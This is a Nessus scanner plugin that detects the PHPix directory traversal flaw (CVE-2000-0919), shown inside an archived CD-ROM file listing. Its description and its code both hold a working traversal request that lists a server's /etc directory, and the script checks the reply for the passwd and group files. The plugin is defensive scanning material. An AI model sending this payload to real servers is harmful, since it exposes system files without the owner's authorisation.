home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phpix.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  69 lines

  1. #
  2. # This script was written by Zorgon <zorgon@linuxstart.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10574);
  10.  script_bugtraq_id(1773);
  11.  script_version ("$Revision: 1.12 $");
  12.  script_cve_id("CVE-2000-0919");
  13.  
  14.  name["english"] = "PHPix directory traversal vulnerability";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "PHPix program allows an attacker to read arbitrary files on the remote web server,  prefixing the pathname of the file with ..%2F..%2F..
  18.  
  19. Example:
  20.     GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
  21.  
  22. will return all the files that are nested within /etc directory.
  23.  
  24. Solution: Contact your vendor for the latest software release.
  25.  
  26. Risk factor : High";
  27.  
  28.  script_description(english:desc["english"]);
  29.  
  30.  summary["english"] = "PHPix directory traversal vulnerability";
  31.  script_summary(english:summary["english"]);
  32.  
  33.  script_category(ACT_GATHER_INFO);
  34.  
  35.  script_copyright(english:"This script is Copyright (C) 2000 Zorgon <zorgon@linuxstart.com>");
  36.  family["english"] = "CGI abuses";
  37.  family["francais"] = "Abus de CGI";
  38.  script_family(english:family["english"], francais:family["francais"]);
  39.  script_dependencie("find_service.nes");
  40.  script_require_ports("Services/www", 80);
  41.  exit(0);
  42. }
  43.  
  44. #
  45. # The script code starts here
  46. #
  47.  
  48. include("http_func.inc");
  49.  
  50. port = get_http_port(default:80);
  51.  
  52. if(get_port_state(port))
  53. {
  54.  soc = http_open_socket(port);
  55.  if(soc)
  56.  {
  57.   buf = http_get(item:string("/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0"),
  58.      port:port);
  59.   send(socket:soc, data:buf);
  60.   rep = http_recv(socket:soc);
  61.   http_close_socket(soc);
  62.   if("Prev 20" >< rep)
  63.       {
  64.     if(("group" >< rep) && ("passwd" >< rep))
  65.              security_hole(port);
  66.     }
  67.  }
  68. }
  69.